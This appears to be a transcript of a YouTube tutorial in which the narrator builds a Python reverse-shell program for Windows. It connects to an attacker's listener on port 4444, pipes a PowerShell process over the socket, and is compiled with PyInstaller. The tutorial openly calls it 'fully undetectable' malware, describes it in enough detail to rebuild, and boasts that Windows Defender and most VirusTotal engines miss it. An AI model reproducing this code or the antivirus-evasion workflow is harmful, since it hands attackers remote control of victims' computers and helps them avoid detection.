So hello guys, my name is Shayon, you are watching Smiths, and in this video we are going to make a fully undetectable Windows based reverse shell malware. So without any further ado, let's get started. So before we get started, make sure to click that like button and also subscribe to the channel and click the bell icon to get more videos like this in the future. So let's get started. So let's open the terminal, the Windows PowerShell terminal, and we should also open git bash, which in this case will be our attacker machine, and this PowerShell terminal will be our victim. Let me just align them, and just let me go to the YouTube directory ls. There are things there, just rmrf them. There's nothing there now. Let me get to YouTube in the other terminal also. Desktop, YouTube, nothing. Just now sublime the winref.py, the main malware program, and here first things first, we have to import some modules. First is of course socket, without which nothing of the network communication can be made, and the second is now subprocess. So without this thing we cannot start any process, we cannot get the reverse shell. And lastly we need threading, which helps us to get a multi-thread to run and receive and send messages continuously. So first we define some global variables. Attacker IP equals the localhost IP. For this case I am not going with the normal other IP, and you can go with any other IP, and attacker port here will be 4444, the most common port. Oops, just forgot to add a note. Change this, and it's done. So now the main piece of code. First we define a socket object. Sock equals socket dot connect attacker IP, attacker port, and just normal client-side programming. It's done. Now we have to start a process. Proc equals subprocess dot popen, which stands for process open, and we need PowerShell.exe because of course it's more powerful. PowerShell.exe, and we need to provide some not CMD arguments but some functional arguments. So I will just explain them in a moment. This stdin pipe and std out pipe. Std error is not pipe, it's std out. So this stdin pipe is just saying that we are creating a channel for the PowerShell program to accept our commands as its input. stdout.pipe says that it gives its output to this winref program, which will send it to the attacker, and std out says that we cannot send errors directly to Python sockets, so we have to send it as normal output. So now the next thing is to create functions. First is the receive function, which will receive data. So first is the while true loop, that is while one loop. Then data equals sock.receive 1024 for now. It can be 1024 or 2048 maybe, or you can just keep 1024. because it's in a while loop. It will get everything until it's finished. So if data is present, what we do? We write it in the stdin of the process. So proc.stdin.write data and proc.stdin.flush, which states that we just execute the piece of code. So now def send, which is the sending function which sends data. So again, while one loop, while true loop, and here if sock.send proc.stdout.read 1. So 1 is the minimum number of bytes it should expect when reading the output of the PowerShell process. It's better to use 1 because sometimes greater number can cause greater problems also. So now less than equals 0, which just states that when a socket object is successful while sending the data, it gives a positive integer, and when it fails, that means the connection is now broken, it gives 0 or less than 0, which means it's not positive and the connection is broken. In that case, we break the loop, which means that the function will return, and because there will be no code after the execution of the line or the return of the line, the program will exit, and the child thread that we will create in just a moment will also exit. So now let's get the child thread. So normal multi-threading, threading the thread target will be our receive function. Daemon will be enabled, that means it will work in the background, the thread will work in the background, and we'll just start the thread. And the main thread has only one work, that is to send the output of the program. And our code is finally ready, the malware is ready. So let's just test it for a moment. First is the ncat listener, ncat and 4444 python 3 winref.py, and we have the PowerShell. Can we write comments? Of course we can. ls, can we get errors? We can get errors. Even we can start cmd in it, we can get errors. dir, it works perfectly. Exit, we exit. Exit, we exit. We have a clean exit. It means that this program or this malware is very stable. So now the only thing that's left is to compile this winref.py malware into a fully undetectable Windows based reversal malware exe file, and for that I have PyInstaller installed. If you don't have it, please install it, and the command is very simple. So PyInstaller -f winref.py, and we just have to wait for a few minutes. And so it's done now. So let's check. It's in the dist folder, and ncat start our listener winref.x. Wait for a few seconds, and we got our shell again. ls cmd, who am I? cmd ls exit, exit, clean exit. Now let's just check it with Windows Defender. So Windows Defender is on, scanning, and no threats found. And this is Windows 10 latest edition. So let's just check it in VirusTotal also, though VirusTotal I know will detect it, but let's try. So choose file, WinRef, upload. One, we got one. Okay, 2, 6. Can we get more? No, we get only 6. But a very interesting thing is that, like Avast, see, Avast, it has not detected it. Then comes, of course, Bitdefender, not detected. Bcaf Pro, not detected. Then where is Windows? Those Kingsoft Malwarebytes, they also didn't detect it. Kaspersky didn't detect it. And where's Windows? Quick Hill doesn't detected it. Windows, where is Windows? Okay, so behavior. Okay, Microsoft's internals had not detected it. And then there's Kappa, not detected it. And anyways, okay, so in conclusion, today we have made our somewhat undetectable and stable Windows reversal malware, and the code of this program will be available in my GitHub. The link will be in my description. And if you like this video, please give it a thumbs up, click that subscribe button and turn on the bell icon to get more content like this. Additionally, before going, make sure to leave me a comment suggesting that what you liked in this video and what you didn't like, and tell me how I can improve, and also give me some ideas about my future videos. So that's all for today. Hope we meet in the next video. Till then, this is Tayan signing off, and bye bye.